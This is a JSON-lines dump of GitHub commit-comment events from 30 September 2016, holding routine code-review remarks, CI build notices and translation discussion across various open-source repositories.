{"id":"4644541427","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":19244272,"position":6,"line":242,"path":"src/ng/anchorScroll.js","commit_id":"9062bae05c002934fe7bfd76043dcc3de9acfde6","created_at":"2016-09-30T16:42:02Z","updated_at":"2016-09-30T16:42:02Z","body":"If people have 123456789123456789 elements on their page, not scrolling to the 123456789123456789th element would be the least of their problems 😛\r\nI agree that using the correct type is always the best approach."}},"created_at":"2016-09-30T16:42:02Z"}
{"id":"4644546396","type":"CommitCommentEvent","actor":{"login":"trash"},"repo":{"name":"sammcgrail/dashmock"},"payload":{"comment":{"id":19244286,"position":42,"line":120,"path":"highchartsmockup.js","commit_id":"624656cd1cf658261324a7da88bfcf173e57e651","created_at":"2016-09-30T16:43:04Z","updated_at":"2016-09-30T16:43:04Z","body":"Instead of constructing an array and then using a `for` loop you could use some es6 jazz. Namely: [Array.prototype.fill](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/fill) and [Array.prototype.map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/map).\r\n\r\nOne line somthing like this:\r\n\r\n```\r\nfunction randArrayMaker(length,volatility,constant) {\r\n  return new Array(length).fill(0).map(number => (Math.random() * volatility) + constant);\r\n}\r\n```"}},"created_at":"2016-09-30T16:43:04Z"}
{"id":"4644547557","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19244287,"position":null,"line":null,"path":null,"commit_id":"66ae6202b681dc86831e7723ef639acc54dd2f00","created_at":"2016-09-30T16:43:18Z","updated_at":"2016-09-30T16:43:18Z","body":"@Bodeguero From now on i will use branches for features, this is a good xperience to learn from"}},"created_at":"2016-09-30T16:43:18Z"}
{"id":"4644551128","type":"CommitCommentEvent","actor":{"login":"rav-rav"},"repo":{"name":"betaflight/betaflight"},"payload":{"comment":{"id":19244295,"position":null,"line":null,"path":null,"commit_id":"cab7b562d8dec756d925380162f47a93f1e5e0eb","created_at":"2016-09-30T16:44:05Z","updated_at":"2016-09-30T16:44:05Z","body":"I like the idea of dynamic coefficients, but I've run into several problems.\r\n\r\nThe correlation between throttle and noise frequency does not seem very linear. It probably depends on the current situation the quad is in, but generally it should be ok to use it as reference.\r\n\r\nAlso the filter needs some time to settle after changing coefficients and constantly adjusting it actually yielded worse results in my experiments.\r\n\r\nI thought about initializing 10 filters or so for different frequency ranges and select one based on current throttle. That's quite some unneeded processing though as they need to be updated constantly. One could keep on updating only the currently active filter and the one above/below the current frequency range to reduce computations... Just some thoughts."}},"created_at":"2016-09-30T16:44:05Z"}
{"id":"4644552264","type":"CommitCommentEvent","actor":{"login":"mnandri"},"repo":{"name":"pixelated/pixelated-user-agent"},"payload":{"comment":{"id":19244297,"position":null,"line":null,"path":null,"commit_id":"bc82002e703118b2347c59106080da03ea69b5c8","created_at":"2016-09-30T16:44:18Z","updated_at":"2016-09-30T16:44:18Z","body":"@deniscostadsc \r\nyes, I have put that on the commit message (line2)\r\n;-)"}},"created_at":"2016-09-30T16:44:18Z"}
{"id":"4644555258","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19244313,"position":null,"line":null,"path":null,"commit_id":"66ae6202b681dc86831e7723ef639acc54dd2f00","created_at":"2016-09-30T16:44:54Z","updated_at":"2016-09-30T16:44:54Z","body":"@Keital yes - I'm also learning not know much"}},"created_at":"2016-09-30T16:44:54Z"}
{"id":"4644558100","type":"CommitCommentEvent","actor":{"login":"MRK1981"},"repo":{"name":"MRK1981/hello-world"},"payload":{"comment":{"id":19244320,"position":null,"line":null,"path":null,"commit_id":"6ac2a3e3ecb3e794a281bb6906a6beac22f51531","created_at":"2016-09-30T16:45:29Z","updated_at":"2016-09-30T16:45:29Z","body":"done"}},"created_at":"2016-09-30T16:45:29Z"}
{"id":"4644558803","type":"CommitCommentEvent","actor":{"login":"cbm755"},"repo":{"name":"cbm755/octsympy"},"payload":{"comment":{"id":19244323,"position":5,"line":65,"path":"inst/@sym/private/mat_replace.m","commit_id":"cfeed87b3bcc15e4407e57985f208bd209d1d6ee","created_at":"2016-09-30T16:45:38Z","updated_at":"2016-09-30T16:45:38Z","body":"ok, send a PR"}},"created_at":"2016-09-30T16:45:38Z"}
{"id":"4644562055","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19244336,"position":null,"line":null,"path":null,"commit_id":"5e838e198fabc7506c1335b58d06aea0f88db195","created_at":"2016-09-30T16:46:18Z","updated_at":"2016-09-30T16:46:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1237](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14778&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T16:46:18Z"}
{"id":"4644565012","type":"CommitCommentEvent","actor":{"login":"taion"},"repo":{"name":"react-bootstrap/react-overlays"},"payload":{"comment":{"id":19244346,"position":36,"line":372,"path":"src/Modal.js","commit_id":"48d39d468884fcceb3b20be163ea631441c7d4e8","created_at":"2016-09-30T16:46:52Z","updated_at":"2016-09-30T16:46:52Z","body":"eww"}},"created_at":"2016-09-30T16:46:52Z"}
{"id":"4644572984","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19244359,"position":null,"line":null,"path":null,"commit_id":"5e838e198fabc7506c1335b58d06aea0f88db195","created_at":"2016-09-30T16:48:31Z","updated_at":"2016-09-30T16:48:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1237](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14778&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:02:13"}},"created_at":"2016-09-30T16:48:31Z"}
{"id":"4644578976","type":"CommitCommentEvent","actor":{"login":"sai5"},"repo":{"name":"sai5/core"},"payload":{"comment":{"id":19244378,"position":null,"line":null,"path":null,"commit_id":"02164f468a744d84dfde1c4420e54dd52b369f24","created_at":"2016-09-30T16:49:47Z","updated_at":"2016-09-30T16:49:47Z","body":"xz"}},"created_at":"2016-09-30T16:49:47Z"}
{"id":"4644580021","type":"CommitCommentEvent","actor":{"login":"sai5"},"repo":{"name":"sai5/core"},"payload":{"comment":{"id":19244381,"position":2,"line":2,"path":"README.md","commit_id":"02164f468a744d84dfde1c4420e54dd52b369f24","created_at":"2016-09-30T16:49:59Z","updated_at":"2016-09-30T16:49:59Z","body":"xxxxxx"}},"created_at":"2016-09-30T16:49:59Z"}
{"id":"4644582357","type":"CommitCommentEvent","actor":{"login":"Japoots"},"repo":{"name":"Japoots/flappyClone"},"payload":{"comment":{"id":19244389,"position":null,"line":null,"path":null,"commit_id":"e0830a466caf3dc569d7f8842cb6d2d30edce278","created_at":"2016-09-30T16:50:27Z","updated_at":"2016-09-30T16:50:27Z","body":"30/09/16 -\r\nJumping added.\r\nMultiple Pipes WIP"}},"created_at":"2016-09-30T16:50:27Z"}
{"id":"4644584825","type":"CommitCommentEvent","actor":{"login":"jonatack"},"repo":{"name":"activerecord-hackery/ransack"},"payload":{"comment":{"id":19244393,"position":null,"line":null,"path":null,"commit_id":"4c98866d5cdbb6ea6bba65c71d090ffdc24ec060","created_at":"2016-09-30T16:50:58Z","updated_at":"2016-09-30T16:50:58Z","body":"The other tests didn't test consecutive customizations.\r\n\r\nAn edge case perhaps, but one can't be too safe 😬"}},"created_at":"2016-09-30T16:50:58Z"}
{"id":"4644588286","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19244401,"position":null,"line":null,"path":null,"commit_id":"560b30ac7664b41f78bca2db5dba4f4fe567147e","created_at":"2016-09-30T16:51:42Z","updated_at":"2016-09-30T16:51:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1238](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14781&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T16:51:42Z"}
{"id":"4644588375","type":"CommitCommentEvent","actor":{"login":"hibri"},"repo":{"name":"mfilippov/HttpMock"},"payload":{"comment":{"id":19244402,"position":5,"line":17,"path":"src/HttpMock.Unit.Tests/EndpointMatchingRuleTests.cs","commit_id":"e743b972d2f59d97afd9652a59bca896fb06e771","created_at":"2016-09-30T16:51:43Z","updated_at":"2016-09-30T16:51:43Z","body":"Like the work you are doing :) Happy to accept a PR, when you are done."}},"created_at":"2016-09-30T16:51:43Z"}
{"id":"4644590511","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19244406,"position":null,"line":null,"path":null,"commit_id":"560b30ac7664b41f78bca2db5dba4f4fe567147e","created_at":"2016-09-30T16:52:09Z","updated_at":"2016-09-30T16:52:09Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1238](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14781&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:27"}},"created_at":"2016-09-30T16:52:09Z"}
{"id":"4644592690","type":"CommitCommentEvent","actor":{"login":"VChet"},"repo":{"name":"i-ka/alchemy"},"payload":{"comment":{"id":19244412,"position":null,"line":null,"path":null,"commit_id":"5114c6662599c68b159577fb65a3aea13033fff9","created_at":"2016-09-30T16:52:34Z","updated_at":"2016-09-30T16:52:34Z","body":"Может убрать на бекенде фильтр из 36edfd4b7fcc051862336228949e4c0ab0a9769b?"}},"created_at":"2016-09-30T16:52:34Z"}
{"id":"4644594774","type":"CommitCommentEvent","actor":{"login":"jonguan"},"repo":{"name":"Microsoft/TypeScript"},"payload":{"comment":{"id":19244417,"position":null,"line":null,"path":null,"commit_id":"7cb2a643503698d3da5469b01d1a8fcd67d2125f","created_at":"2016-09-30T16:52:59Z","updated_at":"2016-09-30T16:52:59Z","body":"For our benefit, would you mind expounding on why type annotation in a for...of statement should be disallowed?\r\nI personally find the type annotation quite helpful.\r\n\r\nThanks!"}},"created_at":"2016-09-30T16:52:59Z"}
{"id":"4644595181","type":"CommitCommentEvent","actor":{"login":"sai5"},"repo":{"name":"sai5/core"},"payload":{"comment":{"id":19244418,"position":2,"line":2,"path":"README.md","commit_id":"02164f468a744d84dfde1c4420e54dd52b369f24","created_at":"2016-09-30T16:53:05Z","updated_at":"2016-09-30T16:53:05Z","body":"[application FORM 1 (1).xlsx](https://github.com/sai5/core/files/503435/application.FORM.1.1.xlsx)\r\n"}},"created_at":"2016-09-30T16:53:05Z"}
{"id":"4644596839","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19244422,"position":32,"line":29,"path":"it/mozorg/home/index-2016.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T16:53:24Z","updated_at":"2016-09-30T16:53:24Z","body":"Grazie Sara.\nI francesi hanno messo:\n > Nous agissons aussi bien au niveau politique que sur le terrain\n\nOperando sia a livello politico che con la gente comune\n\nPotrebbe andare?\n\n\n\n\n\n"}},"created_at":"2016-09-30T16:53:24Z"}
{"id":"4644600930","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"google-aosp/android"},"payload":{"comment":{"id":19244432,"position":null,"line":null,"path":null,"commit_id":"25a493c01ce027bb29ecf624f2e7ae49318baba2","created_at":"2016-09-30T16:54:14Z","updated_at":"2016-09-30T16:54:14Z","body":"Why?"}},"created_at":"2016-09-30T16:54:14Z"}
{"id":"4644601284","type":"CommitCommentEvent","actor":{"login":"dschuff"},"repo":{"name":"WebAssembly/binaryen"},"payload":{"comment":{"id":19244433,"position":5,"line":638,"path":"src/passes/Print.cpp","commit_id":"fb60c1ac3e21ee822ff3209d4ac5022fd06c9a34","created_at":"2016-09-30T16:54:18Z","updated_at":"2016-09-30T16:54:18Z","body":"It probably should. In practice AFAIK we never make empty segments unless it's to represent a completely empty table. We could put an assert somewhere to validate that assumption, but continue probably makes this code correct even without that assumption."}},"created_at":"2016-09-30T16:54:18Z"}
{"id":"4644602357","type":"CommitCommentEvent","actor":{"login":"PouyaPoorrahman"},"repo":{"name":"PouyaPoorrahman/jove"},"payload":{"comment":{"id":19244436,"position":null,"line":null,"path":null,"commit_id":"adbea8ca20fdad6ede215a5c378a4c782e12dc82","created_at":"2016-09-30T16:54:31Z","updated_at":"2016-09-30T16:54:31Z","body":"+Subproject commit 91455dbea7cd438ef8011c11f44f01532438db78"}},"created_at":"2016-09-30T16:54:31Z"}
{"id":"4644604796","type":"CommitCommentEvent","actor":{"login":"EpiJunkie"},"repo":{"name":"chyves/chyves"},"payload":{"comment":{"id":19244441,"position":null,"line":null,"path":null,"commit_id":"1827aaed39e16b1d09f08108a6b274e1f2bcbe8c","created_at":"2016-09-30T16:55:02Z","updated_at":"2016-09-30T16:55:02Z","body":"This new handling should work for versions 3.6 (first appearance of bsd.rd file) to 6.0 (current version to date).\r\n\r\nThis was tested on versions 3.6, 5.9, and 6.0."}},"created_at":"2016-09-30T16:55:02Z"}
{"id":"4644606302","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19244443,"position":null,"line":null,"path":null,"commit_id":"66ae6202b681dc86831e7723ef639acc54dd2f00","created_at":"2016-09-30T16:55:21Z","updated_at":"2016-09-30T16:55:21Z","body":"@Bodeguero https://memegenerator.net/instance/62161223 this will do the trick :D"}},"created_at":"2016-09-30T16:55:21Z"}
{"id":"4644614543","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19244460,"position":152,"line":497,"path":"src/gallium/state_trackers/nine/nine_ff.c","commit_id":"208bed4002a60323304a8d8a5afc2ef9414c7593","created_at":"2016-09-30T16:56:56Z","updated_at":"2016-09-30T16:56:56Z","body":"No, it becomes a->Vtx."}},"created_at":"2016-09-30T16:56:56Z"}
{"id":"4644615160","type":"CommitCommentEvent","actor":{"login":"endless-sky"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19244463,"position":null,"line":null,"path":null,"commit_id":"436d345cb9a2b9a1a9990574ab16013d8155923d","created_at":"2016-09-30T16:57:03Z","updated_at":"2016-09-30T16:57:03Z","body":"![engines](https://cloud.githubusercontent.com/assets/11450262/18999788/5884d206-870d-11e6-9c10-5176fe02abec.jpg)\r\n"}},"created_at":"2016-09-30T16:57:03Z"}
{"id":"4644616567","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19244471,"position":274,"line":597,"path":"src/gallium/state_trackers/nine/nine_ff.c","commit_id":"208bed4002a60323304a8d8a5afc2ef9414c7593","created_at":"2016-09-30T16:57:20Z","updated_at":"2016-09-30T16:57:20Z","body":"indeed, good catch"}},"created_at":"2016-09-30T16:57:20Z"}
{"id":"4644616706","type":"CommitCommentEvent","actor":{"login":"shashankshivdas"},"repo":{"name":"paceuniversity/courses"},"payload":{"comment":{"id":19244472,"position":null,"line":null,"path":null,"commit_id":"649b9aec0289d275efacedcd480ce4d0e3ab588a","created_at":"2016-09-30T16:57:22Z","updated_at":"2016-09-30T16:57:22Z","body":"Shivdas Shashank, September 30, 2016 12:52"}},"created_at":"2016-09-30T16:57:22Z"}
{"id":"4644626922","type":"CommitCommentEvent","actor":{"login":"jshuter"},"repo":{"name":"jshuter/php_profiler"},"payload":{"comment":{"id":19244489,"position":null,"line":null,"path":null,"commit_id":"50b197641f39c4535fadc9603099346dfaf5f6f8","created_at":"2016-09-30T16:59:22Z","updated_at":"2016-09-30T16:59:22Z","body":"merging, but code has no changes"}},"created_at":"2016-09-30T16:59:22Z"}
{"id":"4644626986","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19244490,"position":83,"line":1472,"path":"src/gallium/state_trackers/nine/nine_ff.c","commit_id":"23c5e39d135638573eb57997efe1d160d53d22b3","created_at":"2016-09-30T16:59:26Z","updated_at":"2016-09-30T16:59:26Z","body":"it's used. Grep rMod in nine_ff"}},"created_at":"2016-09-30T16:59:26Z"}
{"id":"4644629569","type":"CommitCommentEvent","actor":{"login":"jgruber"},"repo":{"name":"richbrowne/f5-openstack-agent"},"payload":{"comment":{"id":19244498,"position":null,"line":null,"path":null,"commit_id":"37943979ed24efc11bcd5b9da39cb8e9feb58e34","created_at":"2016-09-30T16:59:56Z","updated_at":"2016-09-30T16:59:56Z","body":"We need to see the TMOS iControl REST bug ID so we can track the dependency with the core team.\r\n\r\nPlease note the iControl SOAP interface for ARP entries functions properly. so this represents a gap between LBaaSv1 and LBaaSv2. "}},"created_at":"2016-09-30T16:59:56Z"}
{"id":"4644630297","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19244500,"position":4,"line":60,"path":"src/mods/chat.js","commit_id":"b050007fa52cf28187f5bbf529ae5dd1c937f093","created_at":"2016-09-30T17:00:04Z","updated_at":"2016-09-30T17:00:04Z","body":"leave the values send to and meant for the server and the css-classes the same, yes."}},"created_at":"2016-09-30T17:00:04Z"}
{"id":"4644633111","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19244510,"position":null,"line":null,"path":null,"commit_id":"23c5e39d135638573eb57997efe1d160d53d22b3","created_at":"2016-09-30T17:00:36Z","updated_at":"2016-09-30T17:00:36Z","body":"Releasing a tmp just enables when you allocate a new one to get a released one.\r\nAt the end of the shader everything is automatically released.\r\nThus it's ok if we leak a few."}},"created_at":"2016-09-30T17:00:36Z"}
{"id":"4644641822","type":"CommitCommentEvent","actor":{"login":"supasteev0"},"repo":{"name":"kaliop/ezdocker-stack"},"payload":{"comment":{"id":19244529,"position":12,"line":12,"path":"config/apache/sites-available/002-dynamic-vhost-ezplatform.conf","commit_id":"9f4733f4393f4f1a5da8fe6061c9583f3a6e0b6a","created_at":"2016-09-30T17:02:21Z","updated_at":"2016-09-30T17:02:21Z","body":"fixed ;)"}},"created_at":"2016-09-30T17:02:21Z"}
{"id":"4644643896","type":"CommitCommentEvent","actor":{"login":"charankool"},"repo":{"name":"charankool/MyWork"},"payload":{"comment":{"id":19244532,"position":null,"line":null,"path":null,"commit_id":"687ac8ee61e0eae932f1e0ad2adc727afa2bedef","created_at":"2016-09-30T17:02:47Z","updated_at":"2016-09-30T17:02:47Z","body":"My Java Work for this week!"}},"created_at":"2016-09-30T17:02:47Z"}
{"id":"4644644990","type":"CommitCommentEvent","actor":{"login":"alexmoore"},"repo":{"name":"basho/riak-ruby-client"},"payload":{"comment":{"id":19244535,"position":5,"line":18,"path":"spec/integration/riak/encodings/crdt_spec.rb","commit_id":"cbf338816dbda89a773a9ff885dc9ba14a1c66a8","created_at":"2016-09-30T17:03:01Z","updated_at":"2016-09-30T17:03:01Z","body":"You should update the other ones too then  ( 'sets', 'maps', etc )"}},"created_at":"2016-09-30T17:03:01Z"}
{"id":"4644647788","type":"CommitCommentEvent","actor":{"login":"mlocati"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":19244538,"position":null,"line":null,"path":null,"commit_id":"a3f0e4bfc080e992bd2cc4765c5fc496c04da6ea","created_at":"2016-09-30T17:03:33Z","updated_at":"2016-09-30T17:03:33Z","body":"It seems that the phpunit muckup doesn't work well with static methods.\r\n\r\nI'll try to see if I can turn all the static calls to non-static"}},"created_at":"2016-09-30T17:03:33Z"}
{"id":"4644648824","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19244542,"position":32,"line":29,"path":"it/mozorg/home/index-2016.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T17:03:46Z","updated_at":"2016-09-30T17:03:46Z","body":"O, copiando proprio dai francesi:\n```Operando sia a livello politico che sul campo,\n\nnon so se strumenti sia riferito solo a strumenti per l'alfabetizzazione \nweb o più in generale a tutte le attività Mozilla.\n\n\n"}},"created_at":"2016-09-30T17:03:46Z"}
{"id":"4644650569","type":"CommitCommentEvent","actor":{"login":"mynameiskeo"},"repo":{"name":"steemit-intl/steemit.com"},"payload":{"comment":{"id":19244549,"position":null,"line":null,"path":null,"commit_id":"6c85a80357a23a71b4177bc0afe027ef0b74f15d","created_at":"2016-09-30T17:04:08Z","updated_at":"2016-09-30T17:04:08Z","body":"doing same in Japan :) hard to catch each other.. You can try with @skzap , otherwise from wednesday i'm back in France"}},"created_at":"2016-09-30T17:04:08Z"}
{"id":"4644651126","type":"CommitCommentEvent","actor":{"login":"mlocati"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":19244551,"position":null,"line":null,"path":null,"commit_id":"a3f0e4bfc080e992bd2cc4765c5fc496c04da6ea","created_at":"2016-09-30T17:04:14Z","updated_at":"2016-09-30T17:04:14Z","body":"@aembler if you push your reverting commit to github I can start working on it"}},"created_at":"2016-09-30T17:04:14Z"}
{"id":"4644651644","type":"CommitCommentEvent","actor":{"login":"TylerCarberry"},"repo":{"name":"RowanACM/ACMAttendanceWebsite"},"payload":{"comment":{"id":19244552,"position":null,"line":null,"path":null,"commit_id":"fda610ff43157cfd8aa4e708afe4d70d31c7b8cf","created_at":"2016-09-30T17:04:20Z","updated_at":"2016-09-30T17:04:20Z","body":"I wanted to add a simple bug to get a freshman involved with Github"}},"created_at":"2016-09-30T17:04:20Z"}
{"id":"4644655302","type":"CommitCommentEvent","actor":{"login":"devimc"},"repo":{"name":"hyperhq/hyperstart"},"payload":{"comment":{"id":19244568,"position":186,"line":325,"path":"src/init.c","commit_id":"6a15977238bc34b3c3c98e52be6128893efc1936","created_at":"2016-09-30T17:05:05Z","updated_at":"2016-09-30T17:05:05Z","body":"Hi @gao-feng , thanks for your answer\r\nyes this remounting operation fails \"/proc is busy\" , I removed these lines and now all it's ok, I'm able to create PODs and containers.  if this operation is not more needed, would be nice to remove it\r\n"}},"created_at":"2016-09-30T17:05:05Z"}
{"id":"4644655624","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19244570,"position":null,"line":null,"path":null,"commit_id":"f706b0edff6f475d6b9f35bed064db0c342ce7e3","created_at":"2016-09-30T17:05:09Z","updated_at":"2016-09-30T17:05:09Z","body":"what's the benefit ? does it decrease constant uploads ?"}},"created_at":"2016-09-30T17:05:09Z"}
{"id":"4644656714","type":"CommitCommentEvent","actor":{"login":"aembler"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":19244573,"position":null,"line":null,"path":null,"commit_id":"a3f0e4bfc080e992bd2cc4765c5fc496c04da6ea","created_at":"2016-09-30T17:05:21Z","updated_at":"2016-09-30T17:05:21Z","body":"It's not actually a static method anymore, so I don't think this should have been approved in the first place. "}},"created_at":"2016-09-30T17:05:21Z"}
{"id":"4644657017","type":"CommitCommentEvent","actor":{"login":"SirSaunders"},"repo":{"name":"RowanACM/ACMAttendanceWebsite"},"payload":{"comment":{"id":19244575,"position":null,"line":null,"path":null,"commit_id":"fda610ff43157cfd8aa4e708afe4d70d31c7b8cf","created_at":"2016-09-30T17:05:25Z","updated_at":"2016-09-30T17:05:25Z","body":"we can just rewind lol"}},"created_at":"2016-09-30T17:05:25Z"}
{"id":"4644658123","type":"CommitCommentEvent","actor":{"login":"joshdekock"},"repo":{"name":"mwrlabs/XRulez"},"payload":{"comment":{"id":19244581,"position":null,"line":null,"path":null,"commit_id":"b744a84d790c09cf2f87cc2c7840fa4733384d49","created_at":"2016-09-30T17:05:38Z","updated_at":"2016-09-30T17:05:38Z","body":"The blog post url should have been changed, not the link, the url has the incorrect spelling."}},"created_at":"2016-09-30T17:05:38Z"}
{"id":"4644659087","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19244583,"position":null,"line":null,"path":null,"commit_id":"f706b0edff6f475d6b9f35bed064db0c342ce7e3","created_at":"2016-09-30T17:05:51Z","updated_at":"2016-09-30T17:05:51Z","body":"yes, we upload NINE_FF_NUM_VS_CONST every DRAW CALL with ff"}},"created_at":"2016-09-30T17:05:51Z"}
{"id":"4644659669","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19244584,"position":23,"line":463,"path":"src/gallium/state_trackers/nine/nine_ff.c","commit_id":"dfa49cb947b1da0281c39e31616706ffcabb9eee","created_at":"2016-09-30T17:05:56Z","updated_at":"2016-09-30T17:05:56Z","body":"would be nice to use i < NINE_FF_NUM_VS_CONST here"}},"created_at":"2016-09-30T17:05:56Z"}
{"id":"4644663713","type":"CommitCommentEvent","actor":{"login":"hfroeb"},"repo":{"name":"hfroeb/Crud"},"payload":{"comment":{"id":19244591,"position":null,"line":null,"path":null,"commit_id":"8701dbad3d122e38e189f7cacba844bdc772eb05","created_at":"2016-09-30T17:06:43Z","updated_at":"2016-09-30T17:06:43Z","body":"fixed index problem, added current event to the edit event page to see what user had before"}},"created_at":"2016-09-30T17:06:43Z"}
{"id":"4644663792","type":"CommitCommentEvent","actor":{"login":"GantMan"},"repo":{"name":"rebeccahughes/react-native-device-info"},"payload":{"comment":{"id":19244592,"position":null,"line":null,"path":null,"commit_id":"299e45935e91ff88fb5eddc30529ed379b9788f4","created_at":"2016-09-30T17:06:43Z","updated_at":"2016-09-30T17:06:43Z","body":"sure @haydenth .   I was hoping to dig through other PRs and see what would justify a release.  Any help in triaging things that should go out the door would be appreciated!"}},"created_at":"2016-09-30T17:06:43Z"}
{"id":"4644667758","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19244602,"position":23,"line":463,"path":"src/gallium/state_trackers/nine/nine_ff.c","commit_id":"dfa49cb947b1da0281c39e31616706ffcabb9eee","created_at":"2016-09-30T17:07:30Z","updated_at":"2016-09-30T17:07:30Z","body":"right, probably belongs to a previous patch"}},"created_at":"2016-09-30T17:07:30Z"}
{"id":"4644670439","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19244605,"position":null,"line":null,"path":null,"commit_id":"66ae6202b681dc86831e7723ef639acc54dd2f00","created_at":"2016-09-30T17:08:03Z","updated_at":"2016-09-30T17:08:03Z","body":"![f49](https://cloud.githubusercontent.com/assets/8006687/19000128/e5e1b4b0-870e-11e6-8f24-3f65af00bf38.jpg)\r\n"}},"created_at":"2016-09-30T17:08:03Z"}
{"id":"4644672942","type":"CommitCommentEvent","actor":{"login":"efge"},"repo":{"name":"nuxeo/nuxeo"},"payload":{"comment":{"id":19244609,"position":25,"line":105,"path":"nuxeo-services/nuxeo-platform-login-shibboleth/src/main/java/org/nuxeo/ecm/platform/shibboleth/service/ShibbolethAuthenticationServiceImpl.java","commit_id":"76e5f6e30f54ca2978fbc961994c1e9c8a4ddac0","created_at":"2016-09-30T17:08:33Z","updated_at":"2016-09-30T17:08:33Z","body":"Here it would be worth avoiding the creation of a session if none exists:\r\n\r\n    HttpSession session = request.getSession(false);\r\n    String redirectUrl = session == null ? null : session.getAttribute(REDIRECT_URL);\r\n    return getLogoutURL(redirectUrl);"}},"created_at":"2016-09-30T17:08:33Z"}
{"id":"4644673297","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"siro20/Mesa-3D"},"payload":{"comment":{"id":19244611,"position":null,"line":null,"path":null,"commit_id":"311b2c265a49e82262b63af943f90188d243832d","created_at":"2016-09-30T17:08:38Z","updated_at":"2016-09-30T17:08:38Z","body":"as said on irc, I'd prefer we fix the last lockable flag bugs. Wine gets it right."}},"created_at":"2016-09-30T17:08:38Z"}
{"id":"4644674457","type":"CommitCommentEvent","actor":{"login":"dlloyd09"},"repo":{"name":"cs50/docs"},"payload":{"comment":{"id":19244615,"position":null,"line":null,"path":null,"commit_id":"649f1ffb289b5b1e50cac109af114673255dc9ee","created_at":"2016-09-30T17:08:53Z","updated_at":"2016-09-30T17:08:53Z","body":"Nice tweaks."}},"created_at":"2016-09-30T17:08:53Z"}
{"id":"4644677888","type":"CommitCommentEvent","actor":{"login":"axeldavy"},"repo":{"name":"siro20/Mesa-3D"},"payload":{"comment":{"id":19244633,"position":null,"line":null,"path":null,"commit_id":"98bbd02756dd1bb5a9d021a035877b0100189012","created_at":"2016-09-30T17:09:36Z","updated_at":"2016-09-30T17:09:36Z","body":"Perhaps precise that zero refcount can happen if object bound ?"}},"created_at":"2016-09-30T17:09:36Z"}
{"id":"4644680640","type":"CommitCommentEvent","actor":{"login":"jumphrey77"},"repo":{"name":"MicrosoftLearning/20532-DevelopingMicrosoftAzureSolutions"},"payload":{"comment":{"id":19244641,"position":null,"line":null,"path":null,"commit_id":"1b5c1a94e843387bcd02b4e4e7da454bfdbb6c1b","created_at":"2016-09-30T17:10:11Z","updated_at":"2016-09-30T17:10:11Z","body":"How do I update this change \"curly brackets\" should be \"curly bracket\""}},"created_at":"2016-09-30T17:10:11Z"}
